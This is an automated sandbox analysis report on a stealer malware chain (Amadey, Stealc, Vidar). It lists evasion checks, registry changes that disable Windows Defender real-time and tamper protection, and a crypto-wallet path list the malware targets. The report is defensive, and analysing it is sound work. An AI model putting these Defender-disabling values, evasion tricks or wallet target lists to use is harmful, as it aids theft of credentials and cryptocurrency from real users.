Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6304	Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6304	Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe TID: 8160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe TID: 2860	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe TID: 7852	Thread sleep time: -922337203685477s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C65C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

0_2_6C65C930

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000017.00000002.3289822715.000000000034D000.00000040.00000001.01000000.0000000E.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849755351.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2991118053.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, a0969106aa.exe, 0000001C.00000002.3076107612.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3070181254.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, a0969106aa.exe, 0000001E.00000002.3139806490.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001F.00000002.3271207100.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Web Data.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Web Data.8.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Web Data.8.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000002.2546281725.00000000005F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0cc%SystemRoot%\system32\mswsock.dll
Source: Web Data.8.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2546281725.0000000000630000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3293696158.0000000000B18000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AD5000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.0000000001749000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3071062804.000000000171B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.8.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware3
Source: Web Data.8.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Web Data.8.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 6fc7e371fe.exe, 00000018.00000002.2849080030.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.8.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.8.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Web Data.8.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.8.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.8.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000002.2546281725.0000000000630000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: Web Data.8.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.8.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.8.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 6fc7e371fe.exe, 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Web Data.8.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: skotes.exe, 00000017.00000002.3293696158.0000000000AE7000.00000004.00000020.00020000.00000000.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2992599240.00000000016B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: 6fc7e371fe.exe, 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareda
Source: Web Data.8.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2547827594.0000000001106000.00000040.00000001.01000000.00000003.sdmp, DocumentsHCFBFBAEBK.exe, 00000015.00000002.2628190504.0000000000A2D000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000016.00000002.2647299566.000000000034D000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000017.00000002.3289822715.000000000034D000.00000040.00000001.01000000.0000000E.sdmp, 6fc7e371fe.exe, 00000018.00000002.2849755351.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, 6fc7e371fe.exe, 0000001B.00000002.2991118053.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, a0969106aa.exe, 0000001C.00000002.3076107612.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp, 6fc7e371fe.exe, 0000001D.00000002.3070181254.0000000001056000.00000040.00000001.01000000.0000000F.sdmp, a0969106aa.exe, 0000001E.00000002.3139806490.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp, a0969106aa.exe, 0000001F.00000002.3271207100.0000000000EDC000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Web Data.8.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Web Data.8.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

Code function: 21_2_04A10BED Start: 04A10BF7 End: 04A10C01

21_2_04A10BED

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

Code function: 21_2_04A10D28 rdtsc

21_2_04A10D28

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

0_2_6C6A5FF0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6AC410 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_6C6AC410

Contains functionality to read the PEB

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_0087652B mov eax, dword ptr fs:[00000030h]	21_2_0087652B
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_0087A302 mov eax, dword ptr fs:[00000030h]	21_2_0087A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0019A302 mov eax, dword ptr fs:[00000030h]	22_2_0019A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0019652B mov eax, dword ptr fs:[00000030h]	22_2_0019652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0019A302 mov eax, dword ptr fs:[00000030h]	23_2_0019A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0019652B mov eax, dword ptr fs:[00000030h]	23_2_0019652B

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C67B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C67B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C82AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 7988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 9188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 2408, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHCFBFBAEBK.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHCFBFBAEBK.exe "C:\Users\user\DocumentsHCFBFBAEBK.exe"
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"

Source: C:\Users\user\Desktop\file.exe

0_2_6C874760

Source: file.exe, file.exe, 00000000.00000002.2547827594.0000000001106000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: CProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C67B341 cpuid

0_2_6C67B341

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

0_2_6C6435A0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 23_2_001665E0 LookupAccountNameA,

23_2_001665E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 23_2_001A2517 GetTimeZoneInformation,

23_2_001A2517

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 22.2.skotes.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.DocumentsHCFBFBAEBK.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.skotes.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.2646374094.0000000000161000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3287170975.0000000000161000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2626788836.0000000000841000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001D.00000003.3027537351.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2047136566.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2990514987.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2947123671.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2849080030.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2547238777.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2800396250.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2849516571.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3069907329.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 7988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 9188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 2408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda 